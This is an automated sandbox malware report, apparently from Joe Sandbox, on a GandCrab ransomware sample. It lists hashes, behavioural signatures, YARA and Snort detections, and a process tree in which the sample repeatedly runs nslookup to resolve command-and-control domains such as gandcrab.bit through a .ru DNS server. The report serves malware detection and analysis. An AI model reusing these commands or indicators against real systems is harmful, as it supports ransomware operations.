Edit tour

Windows Analysis Report
eW1QrimJYd.exe

Overview

General Information

Sample Name:	eW1QrimJYd.exe
Analysis ID:	694557
MD5:	b7325e075262ffdeaa68cae94018cadb
SHA1:	2dee9b7321c736f73831ad5bc9be380b7c81680b
SHA256:	88a85792d16b3e48876aa0ea696784d045499a7ba8e7648d9bb7fb27e94b0ad2
Tags:	exe
Infos:

Detection

Gandcrab

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected Gandcrab

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Snort IDS alert for network traffic

Found evasive API chain (may stop execution after checking mutex)

Contains functionality to determine the online IP of the system

Found Tor onion address

Uses nslookup.exe to query domains

Machine Learning detection for sample

May check the online IP address of the machine

Machine Learning detection for dropped file

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Sample execution stops while process was sleeping (likely an evasion)

Too many similar processes found

Contains functionality to dynamically determine API calls

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates a DirectInput object (often for capturing keystrokes)

Queries information about the installed CPU (vendor, model number etc)

Drops PE files

Found evaded block containing many API calls

Contains functionality to enumerate device drivers

Checks for available system drives (often done to infect USB drives)

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

eW1QrimJYd.exe (PID: 4500 cmdline: "C:\Users\user\Desktop\eW1QrimJYd.exe" MD5: B7325E075262FFDEAA68CAE94018CADB)

nslookup.exe (PID: 5720 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 5276 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 5916 cmdline: nslookup emsisoft.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 5460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 5400 cmdline: nslookup gandcrab.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 5732 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 5964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 4788 cmdline: nslookup emsisoft.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 3572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 5276 cmdline: nslookup gandcrab.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 5380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 6148 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 6168 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 6220 cmdline: nslookup emsisoft.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 6260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 6316 cmdline: nslookup gandcrab.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 6324 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 6372 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 6380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 6528 cmdline: nslookup emsisoft.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 6540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 6632 cmdline: nslookup gandcrab.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 6640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 6720 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 6736 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 6808 cmdline: nslookup emsisoft.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 6820 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 6920 cmdline: nslookup gandcrab.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 6932 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 7028 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 7040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 7100 cmdline: nslookup emsisoft.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 7108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 7156 cmdline: nslookup gandcrab.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 7164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 6164 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 6156 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 6288 cmdline: nslookup emsisoft.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 6260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 2852 cmdline: nslookup gandcrab.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 1432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 2408 cmdline: nslookup nomoreransom.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 6448 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

nslookup.exe (PID: 6392 cmdline: nslookup emsisoft.bit dns1.soprodns.ru MD5: 8E82529D1475D67615ADCB4E1B8F4EEC)

conhost.exe (PID: 6428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

qvvfpl.exe (PID: 3252 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe" MD5: E5E0C9F951E9947AEA55720B7D0299F2)

qvvfpl.exe (PID: 68 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe" MD5: E5E0C9F951E9947AEA55720B7D0299F2)

cleanup

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
eW1QrimJYd.exe	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xf716:$: DECRYPT.txt 0xf784:$: DECRYPT.txt
eW1QrimJYd.exe	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
eW1QrimJYd.exe	Gandcrab	Gandcrab Payload	kevoreilly	0xf70c:$string1: GDCB-DECRYPT.txt 0xf77a:$string1: GDCB-DECRYPT.txt 0xf460:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xf716:$: DECRYPT.txt 0xf784:$: DECRYPT.txt
C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
C:\Users\user\AppData\Roaming\Microsoft\qvvfpl.exe	Gandcrab	Gandcrab Payload	kevoreilly	0xf70c:$string1: GDCB-DECRYPT.txt 0xf77a:$string1: GDCB-DECRYPT.txt 0xf460:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&

Memory Dumps

Source	Rule	Description	Author
00000018.00000002.311448565.0000000000D79000.00000004.00000001.01000000.00000006.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000018.00000000.308301094.0000000000D79000.00000008.00000001.01000000.00000006.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
0000000B.00000000.290444735.0000000000D79000.00000008.00000001.01000000.00000006.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
00000001.00000000.250804234.0000000000A89000.00000008.00000001.01000000.00000003.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmp	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: eW1QrimJYd.exe PID: 4500	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: qvvfpl.exe PID: 3252	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Process Memory Space: qvvfpl.exe PID: 68	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
Click to see the 4 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
11.0.qvvfpl.exe.d70000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xf716:$: DECRYPT.txt 0xf784:$: DECRYPT.txt
11.0.qvvfpl.exe.d70000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
11.0.qvvfpl.exe.d70000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xf70c:$string1: GDCB-DECRYPT.txt 0xf77a:$string1: GDCB-DECRYPT.txt 0xf460:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
11.2.qvvfpl.exe.d70000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xf716:$: DECRYPT.txt 0xf784:$: DECRYPT.txt
11.2.qvvfpl.exe.d70000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
11.2.qvvfpl.exe.d70000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xf70c:$string1: GDCB-DECRYPT.txt 0xf77a:$string1: GDCB-DECRYPT.txt 0xf460:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
24.0.qvvfpl.exe.d70000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xf716:$: DECRYPT.txt 0xf784:$: DECRYPT.txt
24.0.qvvfpl.exe.d70000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
24.0.qvvfpl.exe.d70000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xf70c:$string1: GDCB-DECRYPT.txt 0xf77a:$string1: GDCB-DECRYPT.txt 0xf460:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
1.0.eW1QrimJYd.exe.a80000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xf716:$: DECRYPT.txt 0xf784:$: DECRYPT.txt
1.0.eW1QrimJYd.exe.a80000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
1.0.eW1QrimJYd.exe.a80000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xf70c:$string1: GDCB-DECRYPT.txt 0xf77a:$string1: GDCB-DECRYPT.txt 0xf460:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
1.2.eW1QrimJYd.exe.a80000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xf716:$: DECRYPT.txt 0xf784:$: DECRYPT.txt
1.2.eW1QrimJYd.exe.a80000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
1.2.eW1QrimJYd.exe.a80000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xf70c:$string1: GDCB-DECRYPT.txt 0xf77a:$string1: GDCB-DECRYPT.txt 0xf460:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
24.2.qvvfpl.exe.d70000.0.unpack	SUSP_RANSOMWARE_Indicator_Jul20	Detects ransomware indicator	Florian Roth	0xf716:$: DECRYPT.txt 0xf784:$: DECRYPT.txt
24.2.qvvfpl.exe.d70000.0.unpack	JoeSecurity_Gandcrab	Yara detected Gandcrab	Joe Security
24.2.qvvfpl.exe.d70000.0.unpack	Gandcrab	Gandcrab Payload	kevoreilly	0xf70c:$string1: GDCB-DECRYPT.txt 0xf77a:$string1: GDCB-DECRYPT.txt 0xf460:$string3: action=result&e_files=%d&e_size=%I64u&e_time=%d&
Click to see the 13 entries

Snort Signatures

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.860695532026737 08/31/22-23:49:57.078873
SID:	2026737
Source Port:	60695
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.864649532026737 08/31/22-23:50:23.329807
SID:	2026737
Source Port:	64649
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.850255532829498 08/31/22-23:50:34.185397
SID:	2829498
Source Port:	50255
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862039532829498 08/31/22-23:50:37.987567
SID:	2829498
Source Port:	62039
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.857518532829498 08/31/22-23:49:46.207614
SID:	2829498
Source Port:	57518
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.849468532026737 08/31/22-23:50:44.319184
SID:	2026737
Source Port:	49468
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856571532829500 08/31/22-23:49:21.389711
SID:	2829500
Source Port:	56571
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.863674532829500 08/31/22-23:50:38.481064
SID:	2829500
Source Port:	63674
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.861613532829500 08/31/22-23:49:00.911463
SID:	2829500
Source Port:	61613
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.854197532829500 08/31/22-23:50:08.085752
SID:	2829500
Source Port:	54197
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.861175532026737 08/31/22-23:50:41.147699
SID:	2026737
Source Port:	61175
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.851324532829500 08/31/22-23:49:50.142801
SID:	2829500
Source Port:	51324
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.852486532026737 08/31/22-23:49:02.339569
SID:	2026737
Source Port:	52486
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.849335532829498 08/31/22-23:50:15.024115
SID:	2829498
Source Port:	49335
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.851891532829498 08/31/22-23:50:24.371077
SID:	2829498
Source Port:	51891
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.864544532026737 08/31/22-23:50:11.785305
SID:	2026737
Source Port:	64544
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.853945532829498 08/31/22-23:49:03.940196
SID:	2829498
Source Port:	53945
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862852532829500 08/31/22-23:49:39.251383
SID:	2829500
Source Port:	62852
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.854906532829500 08/31/22-23:48:50.247066
SID:	2829500
Source Port:	54906
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.852869532829500 08/31/22-23:49:26.819001
SID:	2829500
Source Port:	52869
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856360532829500 08/31/22-23:50:13.477447
SID:	2829500
Source Port:	56360
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.857327532026737 08/31/22-23:49:34.029795
SID:	2026737
Source Port:	57327
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.864652532026737 08/31/22-23:50:23.390728
SID:	2026737
Source Port:	64652
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.852847532026737 08/31/22-23:50:18.746734
SID:	2026737
Source Port:	52847
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862850532829500 08/31/22-23:49:39.210928
SID:	2829500
Source Port:	62850
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.853198532829498 08/31/22-23:50:30.152335
SID:	2829498
Source Port:	53198
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.864408532829498 08/31/22-23:49:37.493948
SID:	2829498
Source Port:	64408
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.852845532026737 08/31/22-23:50:18.663879
SID:	2026737
Source Port:	52845
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.861173532026737 08/31/22-23:50:41.105316
SID:	2026737
Source Port:	61173
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856435532829500 08/31/22-23:50:42.448009
SID:	2829500
Source Port:	56435
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.863265532829500 08/31/22-23:50:03.877266
SID:	2829500
Source Port:	63265
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.852818532829500 08/31/22-23:50:07.911995
SID:	2829500
Source Port:	52818
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.853195532829498 08/31/22-23:50:29.933502
SID:	2829498
Source Port:	53195
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856551532026737 08/31/22-23:49:08.399946
SID:	2026737
Source Port:	56551
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.851777532829498 08/31/22-23:50:06.235822
SID:	2829498
Source Port:	51777
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.864801532829500 08/31/22-23:50:34.885486
SID:	2829500
Source Port:	64801
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862734532829500 08/31/22-23:49:54.828233
SID:	2829500
Source Port:	62734
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.852484532026737 08/31/22-23:49:02.302880
SID:	2026737
Source Port:	52484
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.855958532026737 08/31/22-23:49:42.850589
SID:	2026737
Source Port:	55958
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.863672532829500 08/31/22-23:50:38.440019
SID:	2829500
Source Port:	63672
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.849234532026737 08/31/22-23:49:22.846612
SID:	2026737
Source Port:	49234
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.854881532829498 08/31/22-23:50:45.644561
SID:	2829498
Source Port:	54881
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.852867532829500 08/31/22-23:49:26.766420
SID:	2829500
Source Port:	52867
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.860011532829500 08/31/22-23:50:33.089754
SID:	2829500
Source Port:	60011
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.851365532026737 08/31/22-23:50:14.017877
SID:	2026737
Source Port:	51365
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 3 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.863267532829500 08/31/22-23:50:03.917309
SID:	2829500
Source Port:	63267
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.856124532829498 08/31/22-23:48:57.941241
SID:	2829498
Source Port:	56124
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ETPRO TROJAN GandCrab DNS Lookup 1 - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

Timestamp:	192.168.2.68.8.8.862040532829498 08/31/22-23:50:38.007802
SID:	2829498
Source Port:	62040
Destination Port:	53
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET TROJAN Observed GandCrab Domain (gandcrab .bit) - Source IP: 192.168.2.6 - Destination IP: 8.8.8.8

